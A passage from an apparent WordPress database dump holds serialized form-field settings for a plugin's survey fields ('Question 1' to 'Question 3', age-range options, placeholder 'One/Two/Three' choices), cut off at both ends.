dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"31-49\";s:5:\"value\";s:5:\"31-49\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"49+\";s:5:\"value\";s:2:\"49\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}'),(14306,464,'container_class','three-col-list','container_class','three-col-list'),(14307,464,'element_class','','element_class',''),(14308,464,'admin_label','','admin_label',''),(14309,464,'help_text','','help_text',''),(14310,464,'drawerDisabled','','drawerDisabled',''),(14311,464,'parent_id','50','parent_id','50'),(14312,465,'objectType','Field','objectType','Field'),(14313,465,'objectDomain','fields','objectDomain','fields'),(14314,465,'editActive','','editActive',''),(14315,465,'order','7','order','7'),(14316,465,'label','Question 1','label','Question 1'),(14317,465,'type','listselect','type','listselect'),(14318,465,'key','question_1_1523910940120','key','question_1_1523910940120'),(14319,465,'label_pos','default','label_pos','default'),(14320,465,'required','','required',''),(14321,465,'options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(14322,465,'container_class','','container_class',''),(14323,465,'element_class','','element_class',''),(14324,465,'admin_label','','admin_label',''),(14325,465,'help_text','','help_text',''),(14326,465,'drawerDisabled','','drawerDisabled',''),(14327,465,'parent_id','50','parent_id','50'),(14328,466,'objectType','Field','objectType','Field'),(14329,466,'objectDomain','fields','objectDomain','fields'),(14330,466,'editActive','','editActive',''),(14331,466,'order','8','order','8'),(14332,466,'label','Question 2','label','Question 2'),(14333,466,'type','listselect','type','listselect'),(14334,466,'key','question_2_1523910945938','key','question_2_1523910945938'),(14335,466,'label_pos','default','label_pos','default'),(14336,466,'required','','required',''),(14337,466,'options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(14338,466,'container_class','','container_class',''),(14339,466,'element_class','','element_class',''),(14340,466,'admin_label','','admin_label',''),(14341,466,'help_text','','help_text',''),(14342,466,'drawerDisabled','','drawerDisabled',''),(14343,466,'parent_id','50','parent_id','50'),(14344,467,'objectType','Field','objectType','Field'),(14345,467,'objectDomain','fields','objectDomain','fields'),(14346,467,'editActive','','editActive',''),(14347,467,'order','9','order','9'),(14348,467,'label','Question 3','label','Question 3'),(14349,467,'type','listradio','type','listradio'),(14350,467,'key','question_3_1523910957654','key','question_3_1523910957654'),(14351,467,'label_pos','default','label_pos','default'),(14352,467,'required','','required',''),(14353,467,'options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" 